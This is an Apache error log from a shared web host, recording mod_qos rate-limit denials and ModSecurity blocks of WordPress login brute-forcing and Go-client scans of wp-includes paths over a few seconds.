[Tue May 26 20:00:36.576727 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHfAAAABk
[Tue May 26 20:00:36.576981 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHfQAAAGo
[Tue May 26 20:00:36.577485 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHfgAAABU
[Tue May 26 20:00:36.583370 2026] [qos:error] [pid 106517:tid 106651] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWujIZZc2DoU1lPnP1jiQAAAIY
[Tue May 26 20:00:36.583829 2026] [qos:error] [pid 106517:tid 106671] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jigAAAJo
[Tue May 26 20:00:36.592105 2026] [qos:error] [pid 106517:tid 106707] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jjAAAAL0
[Tue May 26 20:00:36.599359 2026] [qos:error] [pid 106517:tid 106685] [client 45.148.10.120:46738] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jjQAAAKc
[Tue May 26 20:00:36.601727 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHgAAAADA
[Tue May 26 20:00:36.682531 2026] [security2:error] [pid 93576:tid 93679] [remote 64.22.104.200:45464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 200.104.22.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWujGDRMqfxdEDkoswHXQAAWGI"]
[Tue May 26 20:00:36.720632 2026] [qos:error] [pid 106517:tid 106681] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jkQAAAKM
[Tue May 26 20:00:36.726274 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHhAAAABU
[Tue May 26 20:00:36.729242 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHhQAAACA
[Tue May 26 20:00:36.730085 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHhgAAADA
[Tue May 26 20:00:36.731476 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHhwAAAEU
[Tue May 26 20:00:36.740383 2026] [qos:error] [pid 106517:tid 106661] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jkgAAAJA
[Tue May 26 20:00:36.746878 2026] [qos:error] [pid 106517:tid 106775] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jkwAAAQE
[Tue May 26 20:00:36.748960 2026] [qos:error] [pid 106517:tid 106729] [client 45.148.10.120:46738] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jlAAAANM
[Tue May 26 20:00:36.755676 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHiAAAAHM
[Tue May 26 20:00:36.781351 2026] [qos:error] [pid 106517:tid 106664] [client 45.148.10.120:46262] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jlQAAAJM
[Tue May 26 20:00:36.873876 2026] [qos:error] [pid 106517:tid 106734] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jlwAAANg
[Tue May 26 20:00:36.879242 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHiwAAADA
[Tue May 26 20:00:36.883617 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHjAAAAEU
[Tue May 26 20:00:36.885578 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHjQAAAHM
[Tue May 26 20:00:36.885763 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHjgAAAHs
[Tue May 26 20:00:36.898593 2026] [qos:error] [pid 106517:tid 106657] [client 45.148.10.120:46738] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jmAAAAIw
[Tue May 26 20:00:36.903243 2026] [qos:error] [pid 106517:tid 106722] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jmQAAAMw
[Tue May 26 20:00:36.904615 2026] [qos:error] [pid 106517:tid 106767] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jmgAAAPk
[Tue May 26 20:00:36.910665 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHjwAAABU
[Tue May 26 20:00:36.931878 2026] [qos:error] [pid 106517:tid 106697] [client 45.148.10.120:46262] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jmwAAALM
[Tue May 26 20:00:37.276710 2026] [security2:error] [pid 106517:tid 106676] [client 103.163.220.46:22245] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/archives/"] [unique_id "ahWujYZZc2DoU1lPnP1jqQAAAJ8"]
[Tue May 26 20:00:37.280835 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG4gAAABo"]
[Tue May 26 20:00:37.291918 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswHAwAAAF0"]
[Tue May 26 20:00:37.308954 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG7gAAADI"]
[Tue May 26 20:00:37.311615 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG7wAAAAs"]
[Tue May 26 20:00:37.323322 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswHBAAAAFY"]
[Tue May 26 20:00:37.327005 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG5QAAAAY"]
[Tue May 26 20:00:37.334802 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswHDQAAAGk"]
[Tue May 26 20:00:37.335846 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswHCQAAAFU"]
[Tue May 26 20:00:37.339214 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG6wAAAHk"]
[Tue May 26 20:00:37.339975 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswHIgAAAAA"]
[Tue May 26 20:00:37.343503 2026] [security2:error] [pid 106517:tid 106735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui4ZZc2DoU1lPnP1jKwAAANk"]
[Tue May 26 20:00:37.346103 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHOAAAACU"]
[Tue May 26 20:00:37.347522 2026] [security2:error] [pid 106517:tid 106684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui4ZZc2DoU1lPnP1jOQAAAKY"]
[Tue May 26 20:00:37.355385 2026] [security2:error] [pid 106517:tid 106731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui4ZZc2DoU1lPnP1jNAAAANU"]
[Tue May 26 20:00:37.363936 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswHBQAAAFI"]
[Tue May 26 20:00:37.364738 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHRQAAAH0"]
[Tue May 26 20:00:37.367084 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswHEAAAABQ"]
[Tue May 26 20:00:37.370486 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswHBgAAAGA"]
[Tue May 26 20:00:37.378210 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHSgAAACE"]
[Tue May 26 20:00:37.378700 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswHDAAAAFo"]
[Tue May 26 20:00:37.379249 2026] [security2:error] [pid 106517:tid 106721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui4ZZc2DoU1lPnP1jPwAAAMs"]
[Tue May 26 20:00:37.395601 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujIZZc2DoU1lPnP1jcQAAALQ"]
[Tue May 26 20:00:37.400313 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHTwAAABM"]
[Tue May 26 20:00:37.403903 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHUAAAAGU"]
[Tue May 26 20:00:37.403908 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswHEQAAAG4"]
[Tue May 26 20:00:37.404243 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHUQAAAA0"]
[Tue May 26 20:00:37.433100 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHPgAAAG8"]
[Tue May 26 20:00:37.437391 2026] [security2:error] [pid 106517:tid 106672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujIZZc2DoU1lPnP1jdQAAAJs"]
[Tue May 26 20:00:37.438954 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHWQAAAGY"]
[Tue May 26 20:00:37.440247 2026] [security2:error] [pid 106517:tid 106763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujIZZc2DoU1lPnP1jcwAAAPU"]
[Tue May 26 20:00:37.527782 2026] [security2:error] [pid 93576:tid 93699] [remote 64.22.104.200:45464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 200.104.22.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWujWDRMqfxdEDkoswHmQAATHU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:00:37.771991 2026] [security2:error] [pid 93576:tid 93809] [client 103.163.220.17:57577] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/PHPMailer/"] [unique_id "ahWujWDRMqfxdEDkoswHzQAAAGE"]
[Tue May 26 20:00:37.797453 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWujWDRMqfxdEDkoswH2QAAAHA
[Tue May 26 20:00:37.797467 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWujWDRMqfxdEDkoswH1wAAACw
[Tue May 26 20:00:37.797564 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWujWDRMqfxdEDkoswH1gAAAEc
[Tue May 26 20:00:37.798048 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWujWDRMqfxdEDkoswH2AAAAH8
[Tue May 26 20:00:37.798120 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWujWDRMqfxdEDkoswH2gAAAFk
[Tue May 26 20:00:37.798266 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWujWDRMqfxdEDkoswH2wAAAFE
[Tue May 26 20:00:37.815054 2026] [qos:error] [pid 106517:tid 106656] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWujYZZc2DoU1lPnP1j6wAAAIs
[Tue May 26 20:00:37.815385 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWujWDRMqfxdEDkoswH4AAAACM
[Tue May 26 20:00:37.817015 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWujYZZc2DoU1lPnP1j7QAAANs
[Tue May 26 20:00:37.817101 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWujWDRMqfxdEDkoswH4QAAACA
[Tue May 26 20:00:37.951335 2026] [qos:error] [pid 106517:tid 106668] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujYZZc2DoU1lPnP1j8gAAAJc
[Tue May 26 20:00:37.951450 2026] [qos:error] [pid 106517:tid 106759] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujYZZc2DoU1lPnP1j8wAAAPE
[Tue May 26 20:00:37.952620 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:53566] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujWDRMqfxdEDkoswH5AAAAF4
[Tue May 26 20:00:37.965492 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:46682] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujWDRMqfxdEDkoswH5QAAAFk
[Tue May 26 20:00:37.969464 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:53542] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujWDRMqfxdEDkoswH5gAAAEc
[Tue May 26 20:00:37.970155 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujWDRMqfxdEDkoswH5wAAAFE
[Tue May 26 20:00:37.972949 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWujWDRMqfxdEDkoswH6AAAAH8
[Tue May 26 20:00:37.973123 2026] [qos:error] [pid 106517:tid 106655] [client 45.148.10.120:53540] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujYZZc2DoU1lPnP1j9wAAAIo
[Tue May 26 20:00:37.973473 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWujYZZc2DoU1lPnP1j-AAAAP8
[Tue May 26 20:00:37.989127 2026] [security2:error] [pid 93576:tid 93769] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWujWDRMqfxdEDkoswHngAAADk"]
[Tue May 26 20:00:38.247945 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:46278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujmDRMqfxdEDkoswH6wAAAAc
[Tue May 26 20:00:38.265727 2026] [security2:error] [pid 93576:tid 93729] [client 103.163.220.15:32423] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahWujmDRMqfxdEDkoswH7gAAABE"]
[Tue May 26 20:00:38.278782 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHWAAAAGI"]
[Tue May 26 20:00:38.286950 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHWgAAACI"]
[Tue May 26 20:00:38.289423 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujIZZc2DoU1lPnP1jdgAAAOY"]
[Tue May 26 20:00:38.290130 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujIZZc2DoU1lPnP1jfQAAAMc"]
[Tue May 26 20:00:38.293818 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHVQAAAGs"]
